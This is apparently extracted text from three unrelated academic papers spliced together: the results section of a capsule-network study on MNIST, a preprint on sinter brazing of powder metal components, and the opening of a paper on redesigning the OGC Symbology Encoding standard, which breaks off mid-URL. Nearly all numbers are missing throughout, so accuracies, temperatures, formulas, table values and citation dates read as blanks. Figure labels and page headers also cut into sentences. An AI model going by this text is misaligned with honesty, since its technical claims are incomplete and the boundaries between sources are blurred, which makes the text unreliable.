capsules. the prediction vector provides instance parameters for the capsule of high- level, and the higher-level capsule will be activated when the information provided by multiple prediction results is consistent.�̂�j|i=wijui the low-level neural capsule i is connected with any high-level capsule j which has a "coupling" relationship with it. by multiplying the corresponding coupling coefficient cij with the j prediction vector �̂�j|i of each low-level capsule i for the high-level capsule, and then weighted sum operation, the output sj can be obtained. the output of the capsule in the next round is a high-dimensional vector vj, which is obtained by squash extrusion function on sj. the calculation formula is as follows. 𝑆𝑗 = ∑ 𝐶𝑖𝑗 ∙𝑖 �̂�𝑗|𝑖 for an intermediate layer capsule, the input is a vector and the output is also a vector, but the input process for it is two stages: ) linear combination: for a linear combination of neurons, the connection weights between capsules are represented by a matrix instead of a scalar value in the form of a vector. ) dynamic routing:the core work of this stage is to determine the close relationship between high level j and low level i, that is to find the most suitable coupling coefficient value cij, which is determined in the repeated process of dynamic routing algorithm. c. dynamic routing algorithm the process of dynamic routing algorithm is as follows: a. softmax processes data b. predict the output c. weighted sum d. compress the vector e. update coupling coefficient the following figure is a description of the dynamic routing algorithm. figure . dynamic routing algorithm ) the three input parameters are �̂�j|i (prediction vector from i to j), r (number of iterations of routing algorithm) and 𝒍 (number of layers of capsule). ) for all layers of 𝒍 capsules and (𝒍 + ) capsules 𝑏𝑖𝑗 ← for all layers of 𝒍capsules and (𝒍 + )capsules, the prior probability coefficient bij of two adjacent layers is initialized to , and its value will be used in the iterative update process of bij. after the iteration, the value is stored in the corresponding cij. ) iteration with r ) the softmax rule is used to calculate the cij between the lower and higher layers. in the beginning, because all bij are initialized to zero, so the obtained cij is also equal. that is to say, in this period, every node in the lower layer is equally important for the high-level capsule. the parent node at the higher level receives all the information from the lower level capsule. this kind of confusion in the initial stage of the algorithm will gradually become clearer in the later iterative calculation. ) the weighted sum of high-level capsules was calculated. the weight of the combination used is the cij obtained in the previous step. ) sj is a vector with a size and a direction. however, if you want its length to be used as the probability of the existence of the entity, you need to normalize its size, and you need to use a nonlinear extrusion function to complete the normalization operation. this function retains the vector direction, and at the same time, the module length of the vector can be compressed within , so the output is the output of the high-level capsule ) the coupling between capsules is dynamic. according to the formula, the larger the result value of �̂�j|i∙vj, that is, the more identical the pose information v Σ c c c n s squash v Σ s squash r= r= vnΣ sn squash r= u u un lowercaps vector . . . b b b n b b b n bnn u u un . . . highercaps vector u / u / u /n ... ... c c c n u / u / u /n ... ... cn cn cnn un/ un/ un/n ... ... ... international journal of advanced network, monitoring and controls volume , no. , of �̂� j|i and vj,the greater the value of bij, which indicates that the coupling degree between the previous layer capsule i and the high-level capsule j is higher dynamic routing algorithm focuses on clustering similar parts together, and then forms a larger granularity identification module. if the predicted vector �̂�j|i and the output vj of one of the high-level capsules are calculated by dot product and the result is very large, the relationship between nodes in this layer and high-level capsules will be strengthened after a reflection from front to back, that is to say, the coupling coefficient will be increased. at the same time, reduce the coupling coefficient with other high- level capsules. after r iterations, count the output of all high-level capsules, and determine the relevant routing parameters. the forward propagation will enter the next capsule layer of the capsule network. d. loss function the traditional cross entropy function only supports the scenario of one classification, so this function is not suitable for capsule network. in order to distinguish multiple classifications in a picture, the edge loss function is used to achieve the objective function of model optimization for each digital capsule k. it is shown in the following formula. 𝐿𝑘 = 𝑇𝑘𝑚𝑎𝑥( , 𝑚 + − ||𝑣𝑘||) + 𝜆( − 𝑇𝑘)𝑚𝑎𝑥⁡( , ||𝑣𝑘|| − 𝑚−)  ( ) in the above formula, tk is the function of classification, k is the classification, the value of tk is related to the existence of the k-th classification, lk is the calculated loss. if and only if the k classification exists, tk is ; if there is no k classification, tk is .|| 𝒗𝒌 ||represents the length of 𝒗𝒌 , which is the probability that the number k exists.𝑚+ , 𝑚_ are the threshold functions indicating the strength of the connection between the capsules .when it is lower than . , it is considered that there is no connection relationship at all, and it is regarded as complete connection if it is higher than . . in detail, 𝒎+ is the upper edge threshold, which is used to deal with the situation that the classification does not exist but exists in the prediction; ⁡𝒎− is the lower edge threshold, which deals with the situation that the classification does exist but is not predicted by the network. 𝝀 is called the sparsity coefficient and is used to adjust the weight between the two thresholds to adjust the parameters and steps. the values of 𝝀 are . , . and . . add the loss lk of each number to get the overall loss of the network. iv. experiment a. experimental environment table ii. experimental environment operating system windows (ram . gb) cpu intel(r)core(tm)i - h gpu nvidia geforce gtx ti dataset mnist other pytorch . . +cu python . . b. experimental data analysis handwritten digital machine vision database is widely used in image recognition and classification. the sample image in mnist is × pixels, including four files: training set image, training set label, test set image and test set label. these files are binary files, each pixel of which is converted to a number between and , where is white and is black. the training set has handwritten training samples. its function is to fit model parameters, such as calculating offset and weight. the test set has samples, and its function is to test the final effect of the model. ) precision of capsule network test figure . test precision chart of capsule network under epochs as shown in figure , the highest accuracy of this training is . % in the th epoch. ) test precision of deep capsule network figure . test accuracy chart of deep capsule network under epochs international journal of advanced network, monitoring and controls volume , no. , as shown in figure , the highest accuracy of this training is . % in the rd epoch. ) when epoch = , the final test accuracy of capsule network is . % figure . test precision chart of capsule network under epochs ) when epoch = , the final test accuracy of deep capsule network is . % figure . test accuracy chart of deep capsule network under epochs ) accuracy comparison between deep capsule network and capsule network figure . comparison between the accuracy of capsule network and deep capsule network as shown in figure , it can be seen that the test accuracy of the deep capsule network in a short epoch increases faster than the accuracy of the capsule network and the recognition accuracy is also higher, under the same conditions. ) performance of deep capsule networks with the same two routes: , , , figure . impact of changing the number of routing iterations on the deep capsule network as shown in the figure , it shows that the number of route iterations is not the more the better, which should be obtained according to the specific experiment of network structure. in a smaller training period, it is more appropriate to select the number of iterations of the primary route times and the number of iterations of the secondary route times. when the two routing iterations are different as to figure . figure . influence of different iteration times of two routes on deep capsule network figure . influence of the same number of two routing iterations on deep capsule network international journal of advanced network, monitoring and controls volume , no. , as shown in the figure , the training time and classification accuracy of the network are compared under different collocation times of "primary route" and "secondary route". from the analysis of the data in the table, if only from the classification accuracy, the combination of "main route" iteration twice and "secondary route" iteration three times is the best, but the training time is long. if the training time and classification accuracy are considered comprehensively, the primary route is best to be iterated once and the secondary route is iterated twice. c. reconstruction in order to understand the reconstructed picture, use the imshow function of matplotlib to draw and visualize, then the input picture and the reconstructed picture are shown in the following figure: figure . schematic diagram of some pictures in mnist database figure . schematic diagram of reconstructed image from the comparison, we can see that the reconstructed digital image is clearer and smoother than the input image. it can be inferred that the reconstructed image has the function of smoothing noise. d. separation of overlapping handwritten numerals in the same way, we train the overlapped handwritten digital images with deep capsule network, and finally put the vectors into the decoder to decode the reconstructed images. some of them are shown in figure , and the separation effect is basically accurate. figure . comparison of input and output images of the network figure shows the three separation effects' 'and' ',' 'and' ', ' 'and' '. it is obvious that the network has been able to separate two completely coincident handwritten digits. even if' 'and' 'overlap and it is difficult for human eyes to separate them, the network can still successfully separate them, with an accuracy rate of . % .the accuracy rate of collaterals was only . %. figure . partial reconstruction results of the improved network figure . improved partial error reconstruction results however, the situation shown in figure still exists in the reconstructed picture. the original overlapping picture is the overlap of the numbers ' ' and ' '. the two reconstructed images are like ' ', without ' ', the reconstruction is wrong, the error rate after the improvement is still . %. international journal of advanced network, monitoring and controls volume , no. , v. conclusion the deep capsule network model in this paper is based on the characteristics and shortcomings of the capsule network. on the one hand, it retains the advantages of capsule network in understanding the attitude of objects; on the other hand, in view of the shortcomings of capsule network, the convolution kernel size of convolution layer is optimized, and the dynamic routing process is improved to twice routing. the final deep capsule network not only retains the advantages of traditional capsule network, but also improves the performance. references [ ] hinton g e, krizhevsky a, wang s d. transforming auto- encoders[c]//international conference on artificial neural networks. springer, berlin, heidelberg, : - . [ ] he k, zhang x, ren s, et al. deep residual learning for image recognition[c]//proceedings of the ieee conference on computer vision and pattern recognition. : - . [ ] hinton, geoffrey e.; sabour, sara; frosst, nicholas. matrix capsules with em routing. . [ ] kosiorek a, sabour s, teh y w, et al. stacked capsule autoencoders[c]//advances in neural information processing systems. : - . [ ] krizhevsky a, sutskever i, hinton g e. imagenet classification with deep convolutional neural networks[c]//advances in neural information processing systems. : - . [ ] lecun y, bottou l, bengio y, et al. gradient-based learning applied to document recognition[j]. proceedings of the ieee, , ( ): - . [ ] lecun, yann, corinna cortes, and christopher jc burges. "the mnist database of handwritten digits, ." url http://yann. lecun. com/exdb/mnist ( ): . [ ] netzer, yuval, et al. "reading digits in natural images with unsupervised feature learning." ( ). [ ] rumelhart d e, hinton g e, williams r j. learning representations by back-propagating errors[j]. nature, , ( ): - . [ ] sabour s, frosst n, hinton g e. dynamic routing between capsules[c]//advances in neural information processing systems. : - . [ ] szegedy c, liu w, jia y, et al. going deeper with convolutions[c]//proceedings of the ieee conference on computer vision and pattern recognition. : - . [ ] zhao w, ye j, yang m, et al. investigating capsulenetworks with dynamic routing for text classification[j].arxiv preprint arxiv: . , easychair preprint № a study on the sinter brazing joint of powder metal components pujan tripathi and george yang easychair preprints are intended for rapid dissemination of research results and are integrated with the rest of easychair. november , a study on the sinter brazing joint of powder metal components pujan tripathi and george yang department of engineering technology missouri western state university downs drive st. joseph, mo , usa abstract: the research focuses on the development of a new joint method, the sinter brazing of powder metal components. various kinds of powder metallurgy composition were tested in the sinter brazing joint, mainly to study the operating conditions, strength of the joint. although each of these processes brings about different results in metal, all of them involve three basic steps: heating, soaking, and cooling. heat treatment such as heating, soaking, cooling, hardening, tampering has been investigated. introduction: powder metallurgy is a processing method where green parts are compacted using dies and get sintered. sintering offers equivalent strength as a cast iron and superior design flexibility and produces near-net- shaped (nns) parts at lower costs and it reduces the need for the machining process. now, sinter brazing is an established joining process for powder metal components, and it is often used in the production of automotive applications. a successfully brazed joint relies widely on the interaction between brazing alloy, the joining surfaces, and sintering atmosphere conditions. the purpose of testing brazing materials is to test the capabilities of the brazing filler materials in order to produce sinter brazed components, processed through sinter brazing to heat treatment with air quench and to compare different brazing pastes to determine their quality and strength to the powder metal components. product designs within the powder metal industries utilize joining techniques to assemble a component from different compacted pieces. this enables pm industries to provide cost-effective complex parts for various applications compared to traditional fabrication practices. sinter-brazing is one of the methods for joining the parts easily and efficiently. brazing mechanism can be complex; however, it has the potential to reduce additional processing steps in a manufacturing scenario. the process can be achieved within one step instead of the traditional two steps. it also has economic advantages [ ]. the metallic bond formed between parent mental surfaces has an adequate strength to achieve the high-performance standards according to the requirements. interconnected porosity generates significant capillary forces that rapidly pull braze away from the connection interface. moreover, the pore network becomes like a conduit that fills the bulk of the part with filler materials which results in a joint deficiency. therefore, porosity is a considerable challenge in the sinter-brazing process. using copper (cu) to infiltrate before brazing can be a potential solution to fill the pore network but is an expensive process. another option is compressing to densities > . g/cm [ ] but has a risk to get reduced strength than expected in the connection interface. burgess norton mfg. co. (geneva illinois) is making powder metal products since and operating seven facilities all over the world. -mpif flc: is a widely used filler alloy for infiltration during the sinter-brazing process by burgess norton. this alloy limits the loss of material in the pore network and creates a strong bond between the parent metal surfaces. this can be achieved by increasing the liquid temperature to increase the surface tension, thus reducing the flowability to prevent braze alloy to penetrate further. however, the process is not entirely smooth and influenced by many external parameters. despite having a high success ratio, it has occasional failure due to excessive infiltration. significant work has been done to understand this challenge within manufacturing. one of the methods to counter excessive infiltration is to add some iron powder to the braze pre-mix to influence the onset of solidification temperature [ , ]. brazing has many established best practices [ , , ]. performing each step of the sintering cycle within the controlled environment is one critical factor. to have an effective relubrication without shooting, a little oxidizing is required within the preheat zone. although, some surface contaminants can negatively influence wetting and hinder braze from flowing through a gap. the excessive oxidizing atmosphere can cause inefficiency in reducing the brazing material, a greenish tint on the surface indicates excessive oxidation [ ]. also, furnace temperature should be adjusted for different loads. furthermore, maintaining consistent temperature is essential to regulate desired brazing metal flow. slow heating rates can segregate braze from ler melting constituents and alloy with an iron after re-solidification, impeding the remaining brazing metal from flowing into the pore network [ ]. for successful brazing, wetting parent material surfacing with liquid braze is one of the key factors. it is important to dissolve the surface oxides by utilizing a flux on brazing and parental material to prevent braze to flow into the pore network within the joint [ ]. however, in that process, glassy residues of metal oxides are left behind which can be adherent in nature. thus, it is recommended to incorporate blind holes or enclosed cavities within the design. regardless, if not performed in a vacuum chamber, adding flux is essential in the sinter-brazing process. traditionally, sinter-brazing was performed with -mpif flc: and sintering in a furnace cycle process. but to challenge the capabilities of sinter brazing materials and its components, another test took a place and the research done with the powder -mpif flc- which showed the significant results in the sinter brazing procedure. materials and methods: the braze alloys that are used in the study are, brazing powder -mpif flc: and - mpif flc- . these are the two most used powder of burgess norton mfg. co. (geneva illinois). the sinter brazing paste is used scm-sinter braze grade:c- and scm-sinter braze grade: exp - . type grade description pre-alloyed steel fl- low alloy steel with pre alloyed manganese, molybdenum and nickel content for better hardenability. hybrid-alloy steel fln - , fln - , fln - , fln - , flnc- , low alloy steel with pre alloyed molybdenum and admixed nickel and copper for better compressibility. table: for the procedure weight of the powder used . to . grams. selected tsi is to . and the pressure used to test the shear strength is , lbs to , lbs.for the testing density needed was . to . g/cm^ . brazing slugs weighted length of . mm, width . mm and approximate height of . mm. brazing material used a sinter brazing paste and in which the weight of the paste used around . to . grams. molybdenum- nickel-steel- pre alloyed- as sintered table: molybdenum-nickel steel – pre-alloyed – heat-treated table: reference: https://www.ssisintered.com/materials/low-alloy-molybdenum-nickel-steels.[ ] method: make slugs of powder brazing powder -mpif flc: and -mpif flc- , the basic requirement for making slugs is to get a density of . to . g/cm^ . once the density and slugs are made use sinter brazing paste on both the different products. once the brazing material is applied the brazed parts are ready for sintering. sintering is effective when the process reduces the porosity and enhances properties such as strength, electrical conductivity, transparency and thermal conductivity; yet, in other cases, it may be useful to increase its strength but keep its gas absorbency constant as in filters or catalysts. during the firing process, atomic diffusion drives powder surface elimination in different stages, starting from the formation of necks between powders to the final elimination of small pores at the end of the process. in a furnace, test brazed parts are heated for hours cycle and at c temperature. once the sintering is done slugs were being tested for the shear strength. once the product is sintered then there are two possibilities for the heat treatment, there might be a chance that the product might get melt, or its bond gets stronger. but there are high chances that the product gets melted. after the sintering the https://www.ssisintered.com/materials/low-alloy-molybdenum-nickel-steels heat treatment took place, heat treatment is any one of several controlled heating and cooling operations used to bring about the desired change in the physical properties of a metal. its purpose is to improve the structural and physical properties for some particular use or for future work of the metal. there are five basic heat-treating processes: hardening, case hardening, annealing, normalizing, and tempering. although each of these processes brings about different results in metal, all of them involve three basic steps: heating, soaking, and cooling. heat treatment steps are as followed, heating, soaking, cooling, hardening, tampering. following the heat treatment process was air quenching carburizing process. specification of this process, a cycle – air cooled, endo gas carburizing, deep freeze tempering – °c – °c the following figure illustrates the method to use the universal tester machine to separate the two brazed components, to calculate shear strength. this device is measuring the rupture strength. shear strength is calculated by the following procedure:  drill a . " ( . mm) diameter hole by . " ( . mm) deep through the center of braze  place a . " dowel pin in the hole and push down with tensile tester until part splits  record reading = breaking load results and conclusion: the research took place at burgess norton mfg. [ ]. co. the test showed that the brazing paste scm- sinter braze grade: exp - showed a significant increase in strength in comparison to the scm-sinter braze grade:c- paste. the exp - paste was also not affected by the heat treat operation (typically weakens). this was a significant finding because no other sinter brazing process are currently heat-treating parts after they have been brazed due to the weakening of the bond. powder - rohs compliant exp - . . ht . . . . shear strength (psi) summary reference: burgess norton mfg. co. [ ] references: . gabrielov, c. wilson, and j. hamill, “sinter-brazing automotive powertrain components,” international journal of powder metallurgy, vol. , , , pp - . . m. frank, “advanced sinter brazed p/m subassemblies in torque transfer systems: reduction hubs and carriers,” sae, . . m. onoda, r. kameda, and t. koiso, “application of sinter-brazing,” metal powder report, november , pp – . . p. beiss, “finishing processes in powder metallurgy,” powder metallurgy, , , , pp - . . m. stromgren and o. andersson, “brazing of p/m parts by sintering,” technical report - pm - . . w. knopp, brazing alloy composition, united states patent , , feb. , . . r. peaslee, “how to identify brazing failures,” advanced materials & processes, december , p . . aws committee, brazing manual, , american welding society, new york, ny. . burgess norton mfg. co. . https://www.ssisintered.com/materials/low-alloy-molybdenum-nickel-steels. https://www.ssisintered.com/materials/low-alloy-molybdenum-nickel-steels a redesign of ogc symbology encoding standard for sharing cartography a redesign of ogc symbology encoding standard for sharing cartography erwan bocher ,* and olivier ertz ,* cnrs, lab-sticc laboratory, umr , vannes, france media engineering institute, heig-vd, university of applied sciences and arts western switzerland, yverdon-les-bains, vaud, switzerland * these authors contributed equally to this work. abstract despite most spatial data infrastructures offering service-based visualization of geospatial data, requirements are often at a very basic level leading to poor quality of maps. this is a general observation for any geospatial architecture as soon as open standards as those of the open geospatial consortium (ogc) are applied. to improve the situation, this paper does focus on improvements at the portrayal interoperability side by considering standardization aspects. we propose two major redesign recommendations. first to consolidate the cartographic theory at the core of the ogc symbology encoding standard. secondly to build the standard in a modular way so as to be ready to be extended with upcoming future cartographic requirements. thus, we start by defining portrayal interoperability by means of typical-use cases that frame the concept of sharing cartography. then we bring to light the strengths and limits of the relevant open standards to consider in this context. finally we propose a set of recommendations to overcome the limits so as to make these use cases a true reality. even if the definition of a cartographic-oriented standard is not able to act as a complete cartographic design framework by itself, we argue that pushing forward the standardization work dedicated to cartography is a way to share and disseminate good practices and finally to improve the quality of the visualizations. subjects spatial and geographic information systems, world wide web and web science keywords cartography, spatial data infrastructure, open standards, portrayal interoperability, open geospatial consortium introduction given how good geospatial technologies take advantage of the constant evolution of information and communication technologies, spatial data infrastructure (sdi) appeared as a new paradigm in geospatial data handling. it extends desktop gis (craglia, ) where data collected by other organizations can be searched, retrieved and manipulated for several usages (tóth et al., ). many regional, national and international initiatives have setup well-defined access policies to promote the arrangement of sdi because location information is important in managing everything that a governance has to organize. currently, several sdi initiatives are particularly well implemented to encourage data discovery and sharing across different communities with various applications. also service-based visualization of geospatial data is part of the sdi components. in the case of how to cite this article bocher and ertz ( ), a redesign of ogc symbology encoding standard for sharing cartography. peerj comput. sci. :e ; doi . /peerj-cs. submitted may accepted december published january corresponding author olivier ertz, olivier.ertz@heig-vd.ch academic editor gabriella pasi additional information and declarations can be found on page doi . /peerj-cs. copyright bocher and ertz distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:olivier.�ertz@�heig-vd.�ch https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ inspire, the infrastructure for spatial information in europe, requirements are defined at a basic level according to inspire drafting team ( ), in section , and inspire drafting team ( ) in section a. , which defines only general portrayal rules as recommendations. as an example, we may notice the technical guidelines on geology (inspire thematic working group geology, ) which does not specify styles required to be supported by inspire view services (section . ) but only recommended styles, often simple to excess, just defining some color tables, stroke width and color, spacing for dashed lines and graphic patterns to repeat in a surface or over a line. these are relatively simple to render with current implementation standards in use. extreme simplicity may be intentional for some cases, but it may also reveal limitations from these implementation standards as soon as styles resulting from a cartographic design are more complex (ertz, ). as a consequence, according to hopfstock & grünreich ( ), with cartographic rules defined at such a basic level, portrayal seems to be considered as a concern of second zone, almost ignoring “the importance of visualization for transforming spatial data into useful gi.” even worse, some contemporary maps coming from sdi exhibit a serious lack of knowledge in cartography with many map-makers repeating some basic mistakes. such as maps from eurostat/regional statistics ( ) where population is represented as a choropleth map (e.g., population on st of january in nuts regions). field ( ) points out that the current demand is for quantity, not for quality, and it is the internet (not the discipline of cartography) which is reacting to this demand. hopfstock & grünreich ( ) underline that poor map design results are the consequence of a “too technology- and/or data-driven approach” and propose improvements by making the cartographic design knowledge explicit and operational. beside such a relevant proposition at the design level, this paper has a focus on the implementation level by making portrayal interoperability operational through the improvement of the open standards dedicated to cartography. indeed, interoperability is key for sdi as interconnected computing systems that can work together to accomplish a common task. and the presence of open standards is required to allow these different systems to communicate with each other without depending on a particular actor (sykora et al., ). the common task presently in question is about the ability for a user community interconnected by interoperable systems to share a cartography used for the authoring of a map. that is, not only the result of a cartographic rendering built of a set of pixels, but also the underlying cartographic instructions which describe how the map is authored. we can figure out how such an ability would participate to empower all types of users, from the cartographic professionals to data artists, journalists and coders (field, ) to gain useful geographical information by means of cartographic visualizations. an ability that contributes to the power of maps, from tools which enable the sharing of spatial information and knowledge, to collaboration through shared creativity and skills transfer between “produsers” for better decision making (bruns, ). for cartographic portrayal interoperability, many sdi policies, like inspire drafting team ( ), advise the use of standards from open geospatial consortium (ogc) like the styled layer descriptor (sld) (lupp, ) and symbology encoding (se) bocher and ertz ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ specifications (müller, ), but it seems these standards were not able to bring to reality the above vision that goes as far as considering sdi as open participation platforms. we might blame the fact that moving from closed monolithic applications to open distributed systems is still under way (sykora et al., ) and that cartography must take effect providing a methodology with a user-oriented approach (hopfstock & grünreich, ). but this paper wants to show how it is also important to have syntactic portrayal interoperability operational with a mature open specification able to standardize the cartographic instructions. we show that the current ogc se standard does offer limited capabilities for describing cartographic symbolizations. then, while we develop some recommendations to improve the situation through more capabilities to customize the map symbology, we also propose some good practices to favor the adoption of the standard by implementors so as to make it really operational for the long term. we believe that these propositions should lead to rich cartographic portrayal interoperability, going further than basic styles. there is no reason sdi users have to be satisfied with often unsuitable maps. from map design to portrayal interoperability clearly, many definitions and types of map exist. as tyner ( ) writes “we all know what a map is, but that definition can vary from person to person and culture to culture.” however, many of them do share the idea of a map as an intellectual construction that is based on the experience and knowledge of the cartographer to manipulate data input according initial hypotheses and its capacity to play with graphic signs (slocum et al., ; tyner, ). furthermore, even if the definition is hard to settle, cartographers have also worked to formalize map syntactics by developing symbol categories and rules to combine them. visual variables are symbols that can be applied to data in order to reveal information. largely based on the bertin & berg ( ) classification, several cartographic authors agree with a set of commons visual variables (carpendale, ; maceachren, ; tyner, ): shape, size, hue (color), value, texture, orientation (fig. ). to create a map, they are individually manipulated or piled up by the cartographer in the process to visually map information about point, line and area features to visual variables (maceachren, ; slocum et al., ). this visual mapping is an embellishment design to improve the aesthetic quality and express efficiently a message (wood & fels, ). even if creating map is an aesthetical exercise it is also a science that must respect some rules to make sure that the representation is accurate. a de facto set of best practices based on visual variables has been accepted by the academy of cartographers (montello, ; mcmaster & mcmaster, ). as bertin & berg ( ) explains, the choice of the “right” visual variable, which would be most appropriate to represent each aspect of information, depends on the type of geographical object but also its characteristics (maceachren, ; nicolas & christine, ). for example, like the statistical nature of the data (qualitative, quantitative), raw data must be represented with proportional symbols and a density of values by an areal classification (i.e., a choropleth map). bocher and ertz ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ these map syntactics are the results of the mainstream cartographic theory and the related design knowledge that help to understand how and why certain displays are more successful for spatial inference and decision making than others. this subject is an important issue to improve map quality at the design phase (hopfstock & grünreich, ). but also at the implementation phase, the theory related to these visual variables to compose map symbols is suitable to drive the definition of a standardized styling language that must be functionally designed and implemented into the geospatial tools making up sdi. in order to explain how such a standardized styling language is an essential piece to enable cartographic portrayal interoperability, let us clarify the related concept of sharing cartography. we consider four use cases typical of sharing levels: � level : discover at this level, sdi users discover pre-styled and ready to be visualized map layers, eventually coming from different systems, they can combine to build a map. for example, it corresponds to the classical geoportal applications offering the user to discover and explore prepared maps and combine prepared layers from various thematics (e.g., map.geo.admin.ch). typically, it does also match with the story of the fictive sdi user mr tüftel in the web portrayal services book (andrae et al., ). mr tüftel wants to unify on the same map the water pipes from his municipality but also the pipes from the municipalities in the neighborhood. these are different data sources he wants to combine in his everyday gis tool. finally, during the discovery of areapoint linesymbol shape size hue value texture orientation variable figure the visual variables of symbols. full-size doi: . /peerj-cs. /fig- bocher and ertz ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ some cartographic facets, the user gains knowledge of the potential of the underlying data sources hosted by the different systems. � level : author starting from level , the potential of the underlying data sources may give to the sdi user some ideas of analytical process which requires to create a new style different from the default. for example, this is useful for mr tüftel in the case he would like to create an unified map of water pipes, but with the problem of getting different visualizations of the pipes (e.g., different colors) from the different municipalities. he would then author a common style (e.g., same color) so as to take the control of the whole rendering process. even further, mr tüftel may enrich the analytical process and take benefit of an extra underlying data that classifies each pipe according to its function (either wastewater or rainwater). he would then author a new style (e.g., orange color for wastewater pipes, blue color for rainwater pipes) so as to produce a suitable map to decide where to build the intercommunal water treatment plant. starting from level some specific use cases become relevant: � level : catalog it is about having at disposal style catalogs offering ready-to-use styles, often tailored for specific thematics, e.g., noise mapping color palettes (epa, ). the ability to import such a specialized symbology into users’ tool just avoid to reinvent the wheel in the sense of re-creating the style from scratch. by analogy, the catalog style use case is similar to how the ogc catalog service for metadata works. � level : collaborate the context of this use case is wider and involves several sdi users into a collaborative authoring process. several users contribute to the creation of a common map, each user having specialized skills to complement one another so as to tell stories as maps, each using her(his) own software (ertz, julien & bocher, ). in other words, cartographic portrayal interoperability enable the freedom to the users to work with the tools they are most comfortable and productive with. also, we may notice the educational capacity of this use case. considering a team of people with different levels of skills in cartography, there are offered the chance to share them. as pointed out by iosifescu-enescu, hugentobler & hurni ( ), “the use of standardized exchange languages is commonly considered as the most practical solution for interoperability especially when it is required to collate resources, like data, from various systems,” but also when it is to take the control of a distributed cartographic rendering process. definitely, starting from level , the definition of a standardized styling language is essential to share cartography: that is the underlying cartographic instruction, what we call the symbology code which constitutes a style that describes how a map is authored. such a definition can be achieved in the same way iosifescu-enescu & hurni ( ) try to define a cartographic ontology by considering that “the building blocks for digital map-making are the primary visual variables (color, opacity, texture, orientation, arrangement, shape, size, focus) and the patterns (arrangement, texture, and bocher and ertz ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ orientation).” also, another starting point is to consider a map (either general-purpose maps, special-purpose maps or thematic maps) as being composed of some graphic elements (either geometric primitives or pictorial elements). this approach matches the ogc se standard which is the standardized styling language (lupp, ) in question here: a style is applied on a dataset to render a map considering a composition of possible symbol elements (called symbolizer) that carry graphical properties (equivalent to visual variables). so as to complete the definition of cartographic portrayal interoperability, fig. shows that such a styling language is at the core of the third stage of the cartographic pipeline, the one dedicated to the style rendering. thus it is to notice that the map layout design which configures a title, a legend, a north arrow, a scale bar, etc. (peterson, ), is out of our scope, as well as the preprocessing stage which is dedicated to the preparation of the dataset to visualize. as an example, building an anamorphic map requires a preliminary processing to generate consistent geometries with preserved shape and topology before styling them. the next part does focus on the technical aspects about how current open standards are able or not to fully meet the conditions of such a cartographic portrayal interoperability. open standards for sharing cartography given the concept of sharing cartography defined by the above four use cases, let us see what are the possibilities and limits to implement them using ogc standards. figure the four stages of the cartographic map design, inspired from nicolas & christine ( ). full-size doi: . /peerj-cs. /fig- bocher and ertz ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ use case “discover” the ogc web map service (wms) standard (de la beaujardiere, ) is currently the only widely accepted open standard for map visualization which standardizes the way for web clients to request maps with predefined symbolization (iosifescu-enescu, hugentobler & hurni, ). this ability, as illustrated with fig. , does match the use case level allowing to discover ready-to-visualize map layers and to combine them to build maps. figure discovery of ready to be visualized map layers with ogc wms standard. full-size doi: . /peerj-cs. /fig- figure visualization of the grid of map sheets of switzerland ( : , ) through a default cartographic style showing a choropleth symbology based on the year of edition of the sheet. full-size doi: . /peerj-cs. /fig- bocher and ertz ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ just send a simple getmap request to the swisstopo wms server to get a predefined colored map layer to overlay in your web mapping application (fig. ): https://wms.geo.admin.ch/?service=wms&version= . . &request= getmap&format=image/png&layers=ch.swisstopo.pixelkarte-pk .metadata- kartenblatt&srs=epsg: &styles=&width= &height= &bbox= , , , the wms getmap operation allows to choose one of the internal styles prepared for a layer by a map-maker (parameter styles). each style is related to one or more datasets attached to the wms server and ready to be used by an end-user. use case “author” the analysis of the use case level described in chapter shows that it is required to establish an open framework able to facilitate decision making through customized maps. iosifescu-enescu ( ) does underline that the wms standard combined with the sld profile and the se is able to fulfill such a requirement. the ability to drive remotely the authoring of visualizations is fundamental for this use case, for example to fulfill the cartographic requirements of mr tüftel. he does not want to download the spatial data, he just wants to adjust the visualization according to his specific needs (fig. ). just send the below wms/sld request which has a reference to a style file. this latter includes some se instructions which allow to get a customized visualization (fig. ): https://wms.geo.admin.ch/?service=wms&version= . . &request= getmap&format=image/png&layers=ch.swisstopo.pixelkarte-pk .metadata- kartenblatt&srs=epsg: &styles=&width= &height= &bbox= , , , &sld=http://my.server/style.sld figure authoring of user style to visualize map layers with ogc wms/sld and se standards. full-size doi: . /peerj-cs. /fig- bocher and ertz ( ), peerj comput. sci., doi . /peerj-cs. / https://wms.geo.admin.ch/?service=wms&version= . . &request=getmap&format=image/png&layers=ch.swisstopo.pixelkarte-pk .metadata-kartenblatt&srs=epsg: &styles=&width= &height= &bbox= , , , https://wms.geo.admin.ch/?service=wms&version= . . &request=getmap&format=image/png&layers=ch.swisstopo.pixelkarte-pk .metadata-kartenblatt&srs=epsg: &styles=&width= &height= &bbox= , , , https://wms.geo.admin.ch/?service=wms&version= . . &request=getmap&format=image/png&layers=ch.swisstopo.pixelkarte-pk .metadata-kartenblatt&srs=epsg: &styles=&width= &height= &bbox= , , , https://wms.geo.admin.ch/?service=wms&version= . . &request=getmap&format=image/png&layers=ch.swisstopo.pixelkarte-pk .metadata-kartenblatt&srs=epsg: &styles=&width= &height= &bbox= , , , https://wms.geo.admin.ch/?service=wms&version= . . &request=getmap&format=image/png&layers=ch.swisstopo.pixelkarte-pk .metadata-kartenblatt&srs=epsg: &styles=&width= &height= &bbox= , , , &sld=http://my.server/style.sld https://wms.geo.admin.ch/?service=wms&version= . . 